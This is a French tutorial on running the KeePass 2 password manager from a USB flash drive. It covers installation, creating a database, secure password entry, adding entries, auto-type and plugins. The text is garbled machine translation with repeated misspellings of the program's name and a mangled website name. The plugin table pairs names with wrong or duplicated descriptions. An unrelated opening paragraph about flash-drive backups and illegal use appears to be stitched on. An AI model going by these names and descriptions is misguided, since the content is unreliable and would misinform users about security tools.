    Nous utilisons ce programme exclusivement pour la sauvegarde rapide du contenu des lecteurs flash sur le disque et les mots de passe de sauvegarde sur le lecteur flash USB. Et qu'avez-vous pensé? L'utilisation illégale de ce logiciel est punissable!

    De nombreuses entreprises, dont Sony et Adobe, sont déjà devenues des victimes de pirates informatiques qui ont volé des millions de mots de passe et d'autres données utilisateur. Une analyse de ces informations a montré que de nombreux utilisateurs utilisent souvent soit des mots de passe peu fiables tels que "123456", ou le même mot de passe pour de nombreux services. Il facilite extrêmement les pirates informatiques de leur tâche et, en même temps, une telle négligence peut être comprise: qui est capable de se rappeler plus d'une douzaine de mots de passe difficiles?

    Une solution simple peut être un morceau de papier collé sous le clavier. Aucun pirate informatique ne peut manger avec lui, mais vous devrez surveiller constamment des personnes situées près de votre ordinateur. Et à partir de cette feuille, il n'y a aucune utilité si vous souhaitez entrer votre compte avec l'ordinateur de quelqu'un d'autre.

    Un outil portable de Keepass 2 gratuit résout ce dilemme. Pour son travail, vous n'aurez besoin que d'un lecteur flash USB avec 10 Mo d'espace libre sur lequel vous installez un programme auxiliaire. À l'avenir, vous devrez vous rappeler qu'un seul mot de passe - de la zone protégée du lecteur flash. Après tout, il conserve les données Keepass de saisir vos services Web sous la forme d'une banque de données codée protégée par le mot de passe principal.

    Troyans, prenant des mots de passe, ne pourra rien soulever. Et puisque vous n'avez plus besoin de rester en mémoire de dizaines de mots de passe, vous pouvez en utiliser un nouveau pour chaque service Web, un mot de passe vraiment fiable. Nous vous dirons maintenant en détail comment utiliser KeepsSass.

    Comment faire

    1 Installez le mot de passe en sécurité


    Installez le mot de passe en sécurité

    Insérez le lecteur flash USB dans le PC, créez un nouveau dossier et copiez le contenu de l'archive avec le logiciel Keepsass. Exécutez le programme Keepass.exe. Après le démarrage, activez la recherche automatique des mises à jour en cliquant sur la fenêtre contextuelle pour «Activer». Puis sélectionnez "Vue | Changez la langue et cliquez sur «Obtenir plus de langues».

    Téléchargez le fichier de langue russe à partir du site d'ouverture en cliquant sur «Russe | 2.25+. " Déballez le contenu de l'archive sur le lecteur USB. Re-cliquez sur "Voir | Changer la langue, "Sélectionnez" Russe "et redémarrez Keepass en appuyant sur le bouton" Oui ".

    2 Créer une nouvelle base de données de mot de passe


    Créer une nouvelle base de données de mot de passe

    Sélectionnez "Fichier | Nouveau "et spécifiez un lecteur USB comme stockage de mot de passe. Dans la fenêtre suivante, le programme vous invitera à définir le mot de passe principal. Il faudra être entré chaque fois que Keepass commence.

    3 Activer le mode protégé


    Activer le mode protégé

    Pour le Troie n'a pas pu compter votre mot de passe pour Keepass, vous devez utiliser le mode de programme protégé, similaire à UAC sous Windows 7. Pour ce faire, allez à Keeps à "Service | Paramètres | Sécurité ", déplacez-vous au bas de la fenêtre et cochez la case en regard de" Entrez le mot de passe principal dans un mode sécurisé ".

    4 Remplir les mots de passe de la base de données


    Remplir les mots de passe de la base de données

    Keepass peut trier les mots de passe par groupes. Par défaut, vous avez des groupes tels que "OS" ou "Internet" dans votre nouveau mot de passe bancaire. Pour créer une nouvelle entrée, sélectionnez le groupe approprié (ou en créer un nouveau), cliquez sur la zone blanche à droite avec le bouton droit de la souris, puis sur "Ajouter un enregistrement".

    Remplissez tous les champs et cliquez sur OK. Puisque vous n'avez plus besoin de rappeler des mots de passe pour entrer chaque compte, vous pouvez définir de nouveaux modestes, plus complexes, pouvant être générés, par exemple, sur le site Web Passwort-Generatorator.com.

    5 Utiliser une autorisation automatique


    Si vous souhaitez vous connecter avec Keepass, ouvrez le groupe dans lequel le mot de passe approprié est stocké. Cliquez avec le bouton droit de la souris sur l'entrée appropriée sur le stockage du mot de passe Keepass et sélectionnez "Démarrer l'autonomisation" dans la liste. Après cela, le programme transférera vos données de navigateur et le navigateur ouvrira une nouvelle fenêtre dans laquelle vous entrerez votre compte.

    Veuillez noter que dans le champ "URL", vous devez entrer l'URL que vous entrez habituellement dans le navigateur pour l'autorisation, sinon vous ne travaillerez pas automatiquement entré le mot de passe via KeepsSASS.

    6 Développez les capacités de Keepass


    Développez les capacités de Keepass

    Si vous souhaitez développer la fonctionnalité de Keepass, allez à "Service | Modules | Plus de modules », après quoi vous serez redirigé vers le site avec des extensions utiles (nos recommandations peuvent être trouvées dans le tableau ci-dessus). Cliquez ici sur le plugin de nom, téléchargez-le et décompressez-le sur le lecteur flash.

    Run Keepsass à nouveau et allez à "Service | Modules. En bas, une liste des plug-ins disponibles apparaîtra (certaines d'entre elles peuvent être configurées).

    Meilleures extensions pour retenir

    Supposons votre sapeur avec des mots de passe avec des fonctionnalités supplémentaires, telles que la fonction de transfert de sauvegarde ou de mot de passe pour téléphones mobiles.

    Nom

    La description

    BeauseBackup. Définit la protection bancaire des mots de passe au cas où le lecteur USB sera volé ou perdu.
    Twofish Cipher.
    Keeagent. Ajoute un algorithme de codage presque impossible à pirater; Notez que pour cette raison, Keepass travaillera plus lentement.
    KeyExchangeur. Ajoute un algorithme de codage presque impossible à pirater; Notez que pour cette raison, Keepass travaillera plus lentement.
    Keaforme Ouvre vos sites préférés en appuyant sur le bouton et effectue automatiquement vos données d'enregistrement.